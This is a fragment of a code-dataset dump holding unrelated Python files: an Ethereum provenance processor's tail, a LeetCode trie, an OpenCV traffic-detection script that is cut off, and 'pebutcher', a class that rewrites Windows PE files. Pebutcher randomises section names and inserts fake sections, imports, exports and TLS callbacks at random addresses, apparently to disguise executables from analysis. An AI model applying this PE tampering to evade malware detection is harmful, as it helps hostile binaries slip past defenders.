event_name.startswith(\"_provenance_\"):\r\n# # print(event)\r\n#\r\n# full_event_name = contract_name + \"_\" + event_name\r\n#\r\n# if full_event_name not in full_event_name_to_event_details:\r\n# args_names_list = []\r\n# args_names_list.append(\"position\")\r\n# for arg_name in event[\"args\"]:\r\n# args_names_list.append(arg_name)\r\n#\r\n# full_event_name_to_event_details[full_event_name] = args_names_list\r\n#\r\n# args_names_list = full_event_name_to_event_details[full_event_name]\r\n# print(\", \".join(args_names_list))\r\n#\r\n# position = str(event[\"blockNumber\"]) + \"_\" + str(event[\"transactionIndex\"]) + \"_\" + str(\r\n# event[\"logIndex\"])\r\n#\r\n# args_values = []\r\n# for arg_name in args_names_list:\r\n# if arg_name == \"position\":\r\n# args_values.append(position)\r\n# else:\r\n# args_values.append(str(event[\"args\"][arg_name]))\r\n#\r\n# write_line_to_file(\"\\t\".join(args_values), facts_dir_path + full_event_name + \".facts\", \"a\")\r\n#\r\n# print(\"\\t\".join(args_values))\r\n# print()\r\n\r\n\r\n# def write_socialite_query(full_event_name_to_event_details):\r\n# write_to_file(\"\", socialite_dir_path + \"query.py\", \"w\")\r\n#\r\n# for full_event_name in full_event_name_to_event_details:\r\n# event_args_str_list = []\r\n# args_names = full_event_name_to_event_details[full_event_name]\r\n# for arg_name in args_names:\r\n# event_args_str_list.append(\"String \" + arg_name)\r\n#\r\n# facts_file_path = facts_dir_path + full_event_name + '.facts'\r\n#\r\n# write_line_to_file('print(\"reading ' + facts_file_path + '\")', socialite_dir_path + \"query.py\", \"a\")\r\n#\r\n# load_rel_cmd = socialite_str_symbol + full_event_name + '(' + ', '.join(event_args_str_list) + ').\\n'\r\n# load_rel_cmd += full_event_name + '(' + ', '.join(args_names) + ') :- l=$read(\"' + facts_file_path + '\"),\\n'\r\n# load_rel_cmd += '(' + ', '.join(args_names) + ') = $split(l,\"\\\\t\").' + socialite_str_symbol + '\\n'\r\n# print(load_rel_cmd)\r\n# print()\r\n#\r\n# write_line_to_file(load_rel_cmd, socialite_dir_path + \"query.py\", \"a\")\r\n\r\n\"\"\"\r\n filters = [ event.createFilter(fromBlock=log[\"block\"], fromBlock=log[\"block\"])\r\n for event in myContract.events\r\n if isinstance(event, contractEvent)]\r\n createFilter(fromBlock=\"latest\", argument_filters={\"arg1\":10})\r\n contractEvent.processReceipt(receipt)\r\n\r\n \r\n print(event)\r\n print()\r\n\"\"\" \r\n\r\n\"\"\"\r\nfilter = w3.eth.filter({\"fromBlock\": 0, \"toBlock\": w3.eth.blockNumber})\r\nlogs = w3.eth.getFilterLogs(filter.filter_id)\r\nprint(len(logs))\r\nfor log in logs: \r\n contract_address = log[\"address\"]\r\n if contract_address in contract_info:\r\n receipt = w3.eth.getTransactionReceipt(log[\"transactionHash\"])\r\n contract_abi = contract_info[contract_address][\"abi\"]\r\n myContract = w3.eth.contract(address=contract_address, abi=contract_abi)\r\n \r\n #p = myContract.events.myEvent().processReceipt(receipt)\r\n for contractEvent in myContract.events:\r\n filters = [ event.createFilter(fromBlock=log[\"block\"], fromBlock=log[\"block\"])\r\n for event in myContract.events\r\n if isinstance(event, contractEvent)]\r\n \r\n \r\n print(event)\r\n print()\r\n \r\n print(receipt)\r\n print()\r\n print()\r\n\r\n\r\n\"\"\"\r\n\r\n\"\"\"\r\nfilter = w3.eth.filter({\"fromBlock\": 0, \"toBlock\": w3.eth.blockNumber})\r\nlogs = w3.eth.getFilterLogs(filter.filter_id)\r\nprint(len(logs))\r\nfor log in logs: \r\n contract_address = log[\"address\"]\r\n if contract_address in contract_info:\r\n receipt = w3.eth.getTransactionReceipt(log[\"transactionHash\"])\r\n contract_abi = contract_info[contract_address][\"abi\"]\r\n myContract = w3.eth.contract(address=contract_address, abi=contract_abi)\r\n \r\n #p = myContract.events.myEvent().processReceipt(receipt)\r\n for contractEvent in myContract.events:\r\n print(event)\r\n print()\r\n \r\n print(receipt)\r\n print()\r\n print()\r\n\r\n\"\"\"\r\n","repo_name":"shomzy/EtherProv","sub_path":"ProvenanceProcessor/ProvenanceProcessor.py","file_name":"ProvenanceProcessor.py","file_ext":"py","file_size_in_byte":48787,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"42601668353","text":"\"\"\"\nhttps://leetcode.com/problems/implement-trie-prefix-tree/\nRuntime: 152 ms, faster than 77.53% of Python3 online submissions for Implement Trie (Prefix Tree).\nMemory Usage: 27.2 MB, less than 66.67% of Python3 online submissions for Implement Trie (Prefix Tree).\n\"\"\"\n\n\nclass Trie:\n def __init__(self):\n self.trie = {}\n\n def insert(self, word: str) -> None:\n dic = self.trie\n for ch in word:\n if not ch in dic.keys():\n dic[ch] = {'end':False}\n dic = dic[ch]\n dic['end'] = True\n\n def search(self, word: str) -> bool:\n dic = self.trie\n for ch in word:\n if ch in dic.keys():\n dic = dic[ch]\n else:\n return False\n return dic['end']\n\n def startsWith(self, prefix: str) -> bool:\n dic = self.trie\n for ch in prefix:\n if ch in dic.keys():\n dic = dic[ch]\n else:\n return False\n return True\n","repo_name":"google-gazzza/algorithm","sub_path":"leetcode/medium/208_implement_trie_prefix_tree/hsh2438.py","file_name":"hsh2438.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"73011184787","text":"import pefile\nfrom pefile import PE\nfrom random import shuffle, randint\nfrom typing import List\nfrom string import ascii_uppercase\nfrom struct import pack\nfrom pebutcher.utils.helpers import mixed_list_to_bytes\n\n\nclass PeWorker:\n \"\"\"\n PeWorker - класс, расширяющий pefile.\n Добавляет функциональность по \"умной\" записи структур данных в pe файл, что сам модуль pefile не поддерживает.\n \"\"\"\n\n def __init__(self, pe: str):\n self.pe = PE(pe)\n self.random_section_names = [b'.puk', b'.kek', b'.chicky', b'bombonya',\n b'.chunky', b'.junky', b'.funky', b'.punky', b'.spunky', b'.skunky', b'.monkey',\n b'.booboo', b'.booboomba', b'.yaah', b'.tutudu',\n b'.t3x7', b'.d474', b'.rDaT4', b'.r310c', b'.p4g3', b'.1337',\n b'.palace', b'.budha', b'.beeba', b'.bubba', b'.tsoy', b'.putin', b'.trump',\n b'.no', b'.yes', b'.r3v', b'.3r5',\n b'.domo', b'.arigato', b'.mister', b'.roboto',\n b'.i_have', b'.higher', b'.grando', b'.anakin']\n\n def randomise_section_names(self):\n shuffle(self.random_section_names)\n for section, name in zip(self.pe.sections, self.random_section_names):\n section.Name = name\n\n def randomize_nt_header_location(self, bytelist: List[str], insert_offset: int) -> bytes:\n \"\"\"\n Вставляет данные в pe файл и обновляет оффсеты прочих структур.\n\n :param bytelist: Данные для вставки (рандомный набор байт)\n :param insert_offset: оффсет (адрес в файле), куда будут вставлены данные\n :return: возвращает измененный pe файл, как набор байт\n \"\"\"\n max_size = self.pe.OPTIONAL_HEADER.FileAlignment\n # если что-то не так в этом коде, то можно просто крашнуться насмерть\n # далее смысла существовать нет\n if len(bytelist) > max_size:\n raise ValueError(\"len(bytelist) > max_size\")\n\n # если что-то не так в этом коде, то можно просто крашнуться насмерть\n # далее смысла существовать нет\n if (len(bytelist) % 4) != 0:\n raise ValueError(\"len(bytelist) % 4 != 0\")\n\n nop_str = ['\\x90'] * (max_size - len(bytelist))\n\n file_data = list(self.pe.__data__)\n\n total_size_of_sect_hdrs = 0\n for section in self.pe.sections:\n total_size_of_sect_hdrs += list(section.__pack__()).__len__()\n\n # вставим нули за section headers для паддинга\n offset_after_sect_hdr = self.pe.sections[0].get_file_offset() + total_size_of_sect_hdrs\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = nop_str\n\n # TODO принимать bytelist не как лист строк, а как bytes\n # вставляем байты до NT_HEADER'ов\n file_data.insert(insert_offset, bytelist)\n self.pe.DOS_HEADER.e_lfanew += len(bytelist)\n\n # Обновляем все PointerToRawData в соответсвие с размером вставки\n for section in self.pe.sections:\n section.PointerToRawData += max_size\n\n self.pe.OPTIONAL_HEADER.CheckSum = self.pe.generate_checksum()\n\n # тае же правим все оффсеты структур\n for structure in self.pe.__structures__:\n offset = structure.get_file_offset()\n if offset >= insert_offset:\n if offset >= offset_after_sect_hdr:\n structure.set_file_offset(offset + max_size)\n else:\n structure.set_file_offset(offset + len(bytelist))\n\n offset = structure.get_file_offset()\n struct_data = list(structure.__pack__())\n file_data[offset:offset + len(struct_data)] = struct_data\n\n # TODO убрать костыль, приводящий все данные к байтам\n new_file_data: bytes = mixed_list_to_bytes(file_data)\n return new_file_data\n\n def modify_sections(self, total_sections_num: int, update_size_of_image: bool) -> bytes:\n \"\"\"\n Функция изменяет секции в pe файле, добавляя новые до числа равного total_sections_num.\n\n :param total_sections_num: общее количество секций после работы функции\n :param update_size_of_image: нужно ли обновить SizeOfImage\n :return: возвращает измененный pe файл, как набор байт\n \"\"\"\n num_sect_to_add = total_sections_num - self.pe.FILE_HEADER.NumberOfSections\n if num_sect_to_add == 0:\n raise ValueError()\n\n self.pe.FILE_HEADER.NumberOfSections = total_sections_num\n\n # выбираем случайные имена для секций\n shuffle(self.random_section_names)\n sect_names = self.random_section_names[:num_sect_to_add]\n\n # сделаем размер всех секций равным self.OPTIONAL_HEADER.FileAlignment\n max_size = self.pe.OPTIONAL_HEADER.FileAlignment\n\n file_data = list(self.pe.__data__)\n\n total_size_of_existing_sect_hdrs = 0\n for section in self.pe.sections:\n total_size_of_existing_sect_hdrs += list(section.__pack__()).__len__()\n sect_hdr_size = self.pe.sections[0].sizeof()\n total_size_of_new_sect_hdrs = num_sect_to_add * sect_hdr_size\n\n # создаем временную секцию, подход будет использоваться далее\n # TODO выделить в отдельную функцию\n tmp_section = pefile.SectionStructure(self.pe.__IMAGE_SECTION_HEADER_format__, pe=self.pe)\n tmp_section.__unpack__(b'\\0' * sect_hdr_size)\n nop_str = ['\\x90'] * (max_size - total_size_of_new_sect_hdrs)\n\n # вычисляем конечный виртуальный адрес последней секции\n end_va = self.pe.sections[len(self.pe.sections) - 1].VirtualAddress + self.pe.sections[\n len(self.pe.sections) - 1].Misc_VirtualSize\n # округляем до размера страницы\n if end_va % 1000:\n end_va += (0x1000 - end_va % 0x1000)\n\n # вставляем SectionHeaders после существующих\n offset_after_sect_hdr = self.pe.sections[0].get_file_offset() + total_size_of_existing_sect_hdrs\n tmp_section.set_file_offset(offset_after_sect_hdr)\n i = 0\n while i < num_sect_to_add:\n tmp_section.Name = sect_names[i]\n tmp_section.set_file_offset(offset_after_sect_hdr)\n tmp_section.SizeOfRawData = max_size\n tmp_section.VirtualAddress = end_va + i * 0x1000\n tmp_section.PointerToRawData = 0x400\n tmp_section.Misc_VirtualSize = 0x200\n tmp_section.Characteristics = 0x40000040\n file_data.insert(offset_after_sect_hdr, tmp_section.__pack__())\n\n offset_after_sect_hdr += sect_hdr_size\n i += 1\n\n # на самом деле загрузчик исполняемых файлов винды не обращает внимание на OPTIONAL_HEADER.SizeOfImage\n # так что его можно не обновлять, но я все равно обновлю для чистоты\n if update_size_of_image:\n self.pe.OPTIONAL_HEADER.SizeOfImage = (tmp_section.Misc_VirtualSize + tmp_section.VirtualAddress)\n self.pe.OPTIONAL_HEADER.SizeOfHeaders += total_size_of_new_sect_hdrs\n\n # вставляем nopы для паддинга\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = nop_str\n\n # обновляем PointerToRawData в секциях\n for section in self.pe.sections:\n section.PointerToRawData += max_size\n\n self.pe.OPTIONAL_HEADER.CheckSum = self.pe.generate_checksum()\n\n # аналогично правим стркутуры\n # TODO выделить в отдельный метод\n for structure in self.pe.__structures__:\n offset = structure.get_file_offset()\n if offset >= offset_after_sect_hdr:\n structure.set_file_offset(offset + max_size)\n\n offset = structure.get_file_offset()\n struct_data = list(structure.__pack__())\n file_data[offset:offset + len(struct_data)] = struct_data\n\n new_file_data: bytes = mixed_list_to_bytes(file_data)\n return new_file_data\n\n def create_delay_load_entries(self, random_dll_list: List[str], random_functions_list) -> bytes:\n \"\"\"\n Функция добавляет в конец секций секцию, где располагает таблицу дескрипторов отложенной загрузки,\n delay load IAT, delay load INT и табличку имен dll.\n\n :param random_dll_list: случайные библиотеки в структуре\n :param random_functions_list: функциии в таблице\n :return: аналогично предыдущим методам\n \"\"\"\n file_data = list(self.pe.__data__)\n self.pe.FILE_HEADER.NumberOfSections += 1\n num_delay_load_entries = len(random_dll_list)\n\n i = 0\n dl_idt = []\n # создаем структуры\n while i < num_delay_load_entries:\n d_import_desc = pefile.Structure(self.pe.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__)\n struct_size = pefile.Structure(self.pe.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__).sizeof()\n d_import_desc.__unpack__(\"\\0\" * struct_size)\n d_import_desc.grAttrs = 1\n d_import_desc.pIAT = 0xAAAAAAAA\n d_import_desc.pINT = 0xBBBBBBBB\n d_import_desc.szName = 0xCCCCCCCC\n dl_idt.append(d_import_desc)\n i += 1\n # создаем на одну дополнительную запись т.к. список структур нультерминирован\n d_import_desc = pefile.Structure(self.pe.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__)\n struct_size = pefile.Structure(self.pe.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__).sizeof()\n d_import_desc.__unpack__(\"\\0\" * struct_size)\n dl_idt.append(d_import_desc)\n\n total_delay_load_directory_table_size = struct_size * (num_delay_load_entries + 1)\n # обновляем размер\n total_delay_load_data_size_for_everything = total_delay_load_directory_table_size\n\n tmp_section = pefile.SectionStructure(self.pe.__IMAGE_SECTION_HEADER_format__, pe=self.pe)\n sect_hdr_size = self.pe.sections[0].sizeof()\n tmp_section.__unpack__(\"\\0\" * sect_hdr_size)\n\n existing_last_section_end_va = self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize\n\n if existing_last_section_end_va % 1000:\n existing_last_section_end_va += (0x1000 - existing_last_section_end_va % 0x1000)\n\n offset_after_dlidt = existing_last_section_end_va + total_delay_load_directory_table_size\n x = 0\n # многомерный имен библиотек\n dl_dll_names = []\n # массив RVA указателей на код для динамической загрузки, адреса не настоящие\n dl_iat = []\n # массив RVA указателей на структуры hint/name\n dl_int = []\n # сами имена и хинты\n dl_hint_names = []\n # аккумулятор листов выше\n master_byte_array = []\n while x < num_delay_load_entries:\n dl_idt[x].szName = offset_after_dlidt + len(master_byte_array)\n dl_dll_names += [[]]\n dl_dll_names[x] += list(random_dll_list[x])\n dl_dll_names[x] += ['\\x00']\n master_byte_array += dl_dll_names[x]\n dl_idt[x].pIAT = offset_after_dlidt + len(master_byte_array)\n num_functions_per_dll = 10\n i = 0\n\n # заполняем iat т.е. он ни от чего не зависит\n dl_iat += [[]]\n while i < num_functions_per_dll:\n dl_iat[x] += [self.pe.OPTIONAL_HEADER.ImageBase + self.pe.sections[0].VirtualAddress + i * 0x10]\n master_byte_array += pack(\"@I\", dl_iat[x][i])\n i += 1\n # не забываем про нультерминатор\n dl_iat[x] += [0]\n master_byte_array += pack(\"@I\", 0)\n\n dl_idt[x].pINT = offset_after_dlidt + len(master_byte_array)\n\n i = 0\n offset_after_dlint = dl_idt[x].pINT + 4 * (\n num_functions_per_dll + 1)\n dl_int += [[]]\n while i < num_functions_per_dll:\n dl_int[x] += [offset_after_dlint]\n i += 1\n dl_int[x] += [0]\n # NOTE выравнивание RVA на 2 взято из mspaint\n i = 0\n dl_hint_names += [[]]\n while i < num_functions_per_dll:\n dl_int[x][i] += len(dl_hint_names[x])\n dl_hint_names[x] += ['\\x00', '\\x00'] # hint нультерминатор\n random_func = random_functions_list[x][randint(0, len(random_functions_list) - 1)]\n dl_hint_names[x] += list(random_func)\n dl_hint_names[x] += ['\\x00'] # null terminator (FIXME: confirm this is necessary?)\n if (len(random_func) + 1) % 2:\n dl_hint_names[x] += ['\\x00', '\\x00', '\\x00']\n i += 1\n\n i = 0\n for num in dl_int[x]:\n # FIXME: this could be the source for some 64 bit incompat. try condition @Q later\n master_byte_array += pack(\"@I\", num)\n master_byte_array += dl_hint_names[x]\n x += 1\n\n # завершаем заполнение\n dlidt_bytes = []\n i = 0\n while i <= num_delay_load_entries:\n d = dl_idt[i]\n dlidt_bytes += list(d.__pack__())\n i += 1\n\n file_data_len_before_inserts = len(file_data)\n file_data += dlidt_bytes\n\n file_data += master_byte_array\n\n total_section_size = len(dlidt_bytes) + len(master_byte_array)\n nop_str = ['\\x90'] * (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n\n file_data += nop_str\n\n # Вставляем section header\n offset_after_sect_hdr = self.pe.sections[-1].get_file_offset() + sect_hdr_size\n\n tmp_section.set_file_offset(offset_after_sect_hdr)\n tmp_section.Name = \".dload\"\n tmp_section.Misc_VirtualSize = total_section_size\n\n tmp_section.SizeOfRawData = total_section_size + (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n tmp_section.VirtualAddress = existing_last_section_end_va\n\n tmp_section.PointerToRawData = file_data_len_before_inserts + self.pe.OPTIONAL_HEADER.FileAlignment\n tmp_section.Characteristics = 0x40000040\n\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = list(tmp_section.__pack__())\n offset_after_sect_hdr += sect_hdr_size\n\n nop_str = ['\\x90'] * (self.pe.OPTIONAL_HEADER.FileAlignment - sect_hdr_size)\n\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = nop_str\n\n self.pe.OPTIONAL_HEADER.SizeOfImage = (total_delay_load_data_size_for_everything + tmp_section.VirtualAddress)\n self.pe.OPTIONAL_HEADER.SizeOfHeaders += sect_hdr_size\n\n for section in self.pe.sections:\n section.PointerToRawData += self.pe.OPTIONAL_HEADER.FileAlignment\n\n self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[13].VirtualAddress = tmp_section.VirtualAddress\n self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[13].Size = len(dlidt_bytes)\n if self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[11].VirtualAddress:\n self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[11].VirtualAddress += self.pe.OPTIONAL_HEADER.FileAlignment\n\n self.pe.OPTIONAL_HEADER.CheckSum = self.pe.generate_checksum()\n\n for structure in self.pe.__structures__:\n\n offset = structure.get_file_offset()\n if offset >= tmp_section.get_file_offset():\n structure.set_file_offset(offset + self.pe.OPTIONAL_HEADER.FileAlignment)\n\n offset = structure.get_file_offset()\n struct_data = list(structure.__pack__())\n file_data[offset:offset + len(struct_data)] = struct_data\n\n new_file_data: bytes = mixed_list_to_bytes(file_data)\n return new_file_data\n\n def create_exports(self, random_funcs_num, random_functions: list) -> bytes:\n \"\"\"\n Функция создает новую секцию с экспортами\n :param random_funcs_num: количество функций экспорта\n :param random_functions: случайные имена функций\n :return: аналогично\n \"\"\"\n if not self.pe.is_dll():\n raise ValueError(\"if not self.pe.is_dll()\")\n\n file_data = list(self.pe.__data__)\n file_data_len_before_inserts = len(file_data)\n\n self.pe.FILE_HEADER.NumberOfSections += 1\n exported_func_names = []\n i = 0\n while i < random_funcs_num:\n index = randint(0, len(random_functions) - 1)\n while random_functions[index] in exported_func_names:\n index = randint(0, len(random_functions) - 1)\n exported_func_names.append(random_functions[index])\n i += 1\n\n tmp_section = pefile.SectionStructure(self.pe.__IMAGE_SECTION_HEADER_format__, pe=self.pe)\n\n sect_hdr_size = self.pe.sections[0].sizeof()\n tmp_section.__unpack__(\"\\0\" * sect_hdr_size)\n\n existing_last_section_end_va = self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize\n if existing_last_section_end_va % 1000:\n existing_last_section_end_va += (0x1000 - existing_last_section_end_va % 0x1000)\n\n master_byte_array = []\n self.pe.DIRECTORY_ENTRY_EXPORT.struct.NumberOfNames += random_funcs_num # TODO add in the existing entries\n self.pe.DIRECTORY_ENTRY_EXPORT.struct.NumberOfFunctions += random_funcs_num\n self.pe.DIRECTORY_ENTRY_EXPORT.struct.AddressOfFunctions = existing_last_section_end_va\n\n # получаем начало .text секции, чтобы сделать адреса более правдоподобными\n text_start = self.pe.sections[0].VirtualAddress\n text_end = text_start + self.pe.sections[0].Misc_VirtualSize\n eat = []\n i = 0\n while i < random_funcs_num:\n eat += [randint(text_start, text_end)]\n # FIXME: this could be the source for some 64 bit incompat. try condition @Q later\n master_byte_array += pack(\"@I\", eat[i])\n i += 1\n\n exported_func_names.sort()\n # export_names = []\n name_ordinals = []\n ENT = []\n offset = 0\n i = 0\n while i < random_funcs_num:\n name_ordinals += [i]\n ENT += [existing_last_section_end_va + len(master_byte_array)]\n master_byte_array += list(exported_func_names[i])\n master_byte_array += ['\\x00'] # не забываем нультерминатор\n i += 1\n\n self.pe.DIRECTORY_ENTRY_EXPORT.struct.AddressOfNames = existing_last_section_end_va + len(master_byte_array)\n for num in ENT:\n # FIXME: здесь и далее - возможно несовместимость с некоторыми x64 бинарями\n master_byte_array += pack(\"@I\", num)\n self.pe.DIRECTORY_ENTRY_EXPORT.struct.AddressOfNameOrdinals = existing_last_section_end_va + len(\n master_byte_array)\n for num in name_ordinals:\n master_byte_array += pack(\"@H\", num)\n # запишем все данные, которые собрали\n file_data += master_byte_array\n total_section_size = len(master_byte_array)\n\n # паддинг после вставленной секции\n nop_str = ['\\x90'] * (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n file_data += nop_str\n\n # стандартным образом всталвем секцию в хедере\n offset_after_sect_hdr = self.pe.sections[-1].get_file_offset() + sect_hdr_size\n\n tmp_section.set_file_offset(offset_after_sect_hdr)\n tmp_section.Name = b'.ebata'\n tmp_section.Misc_VirtualSize = total_section_size\n # выравниваем данные до размера self.pe.OPTIONAL_HEADER.FileAlignment\n tmp_section.SizeOfRawData = total_section_size + (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n tmp_section.VirtualAddress = existing_last_section_end_va\n # изменяем данные о конце файла\n tmp_section.PointerToRawData = file_data_len_before_inserts + self.pe.OPTIONAL_HEADER.FileAlignment\n tmp_section.Characteristics = 0x40000040\n\n # вставляем секцию\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = list(tmp_section.__pack__())\n offset_after_sect_hdr += sect_hdr_size\n\n # паддинг\n nop_str = ['\\x90'] * (self.pe.OPTIONAL_HEADER.FileAlignment - sect_hdr_size)\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = nop_str\n\n # обновим на всякий случай\n self.pe.OPTIONAL_HEADER.SizeOfImage = (tmp_section.VirtualAddress + tmp_section.Misc_VirtualSize)\n self.pe.OPTIONAL_HEADER.SizeOfHeaders += sect_hdr_size\n\n # обновим PointerToRawData\n for section in self.pe.sections:\n section.PointerToRawData += self.pe.OPTIONAL_HEADER.FileAlignment\n\n self.pe.OPTIONAL_HEADER.CheckSum = self.pe.generate_checksum()\n\n # обновим оффсеты структур\n for structure in self.pe.__structures__:\n\n offset = structure.get_file_offset()\n if offset >= tmp_section.get_file_offset():\n structure.set_file_offset(offset + self.pe.OPTIONAL_HEADER.FileAlignment)\n\n offset = structure.get_file_offset()\n struct_data = list(structure.__pack__())\n file_data[offset:offset + len(struct_data)] = struct_data\n\n new_file_data: bytes = mixed_list_to_bytes(file_data)\n return new_file_data\n\n\n def create_tls(self, random_callback_addresses: List[int]) -> bytes:\n \"\"\"\n Создает новую секцию с tls директорией\n :param random_callback_addresses: случайные адреса для коллбеков в с��руктуре\n :return: аналогично\n \"\"\"\n file_data = list(self.pe.__data__)\n # указатель pointerToRawData\n file_data_len_before_inserts = len(file_data)\n\n self.pe.FILE_HEADER.NumberOfSections += 1\n\n tls_dir = pefile.Structure(self.pe.__IMAGE_TLS_DIRECTORY_format__)\n tls_dir.__unpack__(\"\\0\" * tls_dir.sizeof())\n tmp_section = pefile.SectionStructure(self.pe.__IMAGE_SECTION_HEADER_format__, pe=self.pe)\n if not tmp_section:\n raise ValueError(\"tmp_section = pefile.SectionStructure(self.pe.__IMAGE_SECTION_HEADER_format__, pe=self)\")\n\n sect_hdr_size = self.pe.sections[0].sizeof()\n tmp_section.__unpack__(b'\\0' * sect_hdr_size)\n\n # получим va последней секции\n existing_last_section_end_va = self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize\n # round up to the nearest 0x1000\n if existing_last_section_end_va % 1000:\n existing_last_section_end_va += (0x1000 - existing_last_section_end_va % 0x1000)\n\n master_byte_array = []\n # вставляем таблицу коллбеков сразу за секцией\n tls_dir.AddressOfCallBacks = self.pe.OPTIONAL_HEADER.ImageBase + existing_last_section_end_va + tls_dir.sizeof()\n\n i = 0\n while i < len(random_callback_addresses):\n # FIXME: this could be the source for some 64 bit incompat. try condition @Q later\n master_byte_array += pack(\"@I\", random_callback_addresses[i])\n i += 1\n\n file_data += list(tls_dir.__pack__())\n file_data += master_byte_array\n total_section_size = tls_dir.sizeof() + len(master_byte_array)\n\n\n nop_str = ['\\x90'] * (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n\n file_data += nop_str\n\n offset_after_sect_hdr = self.pe.sections[-1].get_file_offset() + sect_hdr_size\n\n tmp_section.set_file_offset(offset_after_sect_hdr)\n tmp_section.Name = \".tls\"\n tmp_section.Misc_VirtualSize = total_section_size + 0x200\n\n\n tmp_section.SizeOfRawData = total_section_size + (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n tmp_section.VirtualAddress = existing_last_section_end_va\n\n tmp_section.PointerToRawData = file_data_len_before_inserts + self.pe.OPTIONAL_HEADER.FileAlignment\n tmp_section.Characteristics = 0x40000040\n\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = list(tmp_section.__pack__())\n offset_after_sect_hdr += sect_hdr_size\n\n nop_str = ['\\x90'] * (self.pe.OPTIONAL_HEADER.FileAlignment - sect_hdr_size)\n\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = nop_str\n\n self.pe.OPTIONAL_HEADER.SizeOfImage = (tmp_section.VirtualAddress + tmp_section.Misc_VirtualSize)\n self.pe.OPTIONAL_HEADER.SizeOfHeaders += sect_hdr_size\n\n self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].VirtualAddress = tmp_section.VirtualAddress\n self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].Size = tmp_section.Misc_VirtualSize\n\n for section in self.pe.sections:\n section.PointerToRawData += self.pe.OPTIONAL_HEADER.FileAlignment\n\n self.pe.OPTIONAL_HEADER.CheckSum = self.pe.generate_checksum()\n\n for structure in self.pe.__structures__:\n\n offset = structure.get_file_offset()\n if offset >= tmp_section.get_file_offset():\n structure.set_file_offset(offset + self.pe.OPTIONAL_HEADER.FileAlignment)\n\n offset = structure.get_file_offset()\n struct_data = list(structure.__pack__())\n file_data[offset:offset + len(struct_data)] = struct_data\n\n new_file_data: bytes = mixed_list_to_bytes(file_data)\n return new_file_data\n","repo_name":"fuunyaka/pebutcher","sub_path":"pebutcher/utils/peworker.py","file_name":"peworker.py","file_ext":"py","file_size_in_byte":27634,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31103034640","text":"import numpy as np\nimport cv2\nimport sys\n\n# cap = cv2.VideoCapture('2017_06_23_1430_Falen_Cigaren_mod_byen.mp4')\ncap = cv2.VideoCapture('2015_06_27_1630_Krydset_Motorvejsafkørsel_52.mp4') # 35 / 6 / 2\n# cap = cv2.VideoCapture('KrydsetFaaborgvejSanderumvej1.mp4')\n\ncv2.namedWindow(\"frame\", cv2.WINDOW_NORMAL)\ncv2.namedWindow(\"avg\", cv2.WINDOW_NORMAL)\ncv2.namedWindow(\"TD\", cv2.WINDOW_NORMAL)\ncv2.namedWindow(\"TD_thres\", cv2.WINDOW_NORMAL)\ncv2.namedWindow(\"avg_thres\", cv2.WINDOW_NORMAL)\ncv2.namedWindow(\"avg_frame\", cv2.WINDOW_NORMAL)\n\ndef nothing(x):\n pass\n\ncv2.createTrackbar('threshold_TD','frame',0,255, nothing)\ncv2.createTrackbar('threshold_AVG','frame',0,255, nothing)\ncv2.createTrackbar('alpha','frame',0,100, nothing)\ncv2.createTrackbar('opening','frame',1,100, nothing)\ncv2.createTrackbar('closing','frame',1,100, nothing)\n\n# Init pos\ncv2.setTrackbarPos('threshold_TD', 'frame', 0) #38\ncv2.setTrackbarPos('threshold_AVG', 'frame', 0) #38\ncv2.setTrackbarPos('alpha', 'frame', 1)\ncv2.setTrackbarPos('opening', 'frame', 1)\ncv2.setTrackbarPos('closing', 'frame', 1)\n\n### Params ###\nstabilize = False\n\n### init Fast for image stabilization ###\norb = cv2.ORB_create()\nMIN_MATCH_COUNT = 10\n\n# FLANN parameters\nFLANN_INDEX_LSH = 6\nindex_params= dict(algorithm = FLANN_INDEX_LSH,\n table_number = 6, # 12\n key_size = 12, # 20\n multi_probe_level = 1) #2\nsearch_params = dict(checks=50) # or pass empty dictionary\n\nflann = cv2.FlannBasedMatcher(index_params, search_params)\n\n# initlize\nret, firstFrame = cap.read()\nfirstFrame = cv2.cvtColor(firstFrame, cv2.COLOR_BGR2GRAY)\navg = np.float32(firstFrame)\n\nprevFrame = firstFrame\n\nwhile cap.isOpened():\n ret, currFrame = cap.read()\n\n outFrame = currFrame\n currFrame = cv2.cvtColor(currFrame, cv2.COLOR_BGR2GRAY)\n\n # trackbars\n thrs_td = cv2.getTrackbarPos('threshold_TD', 'frame')\n thrs_avg = cv2.getTrackbarPos('threshold_AVG', 'frame')\n alpha = 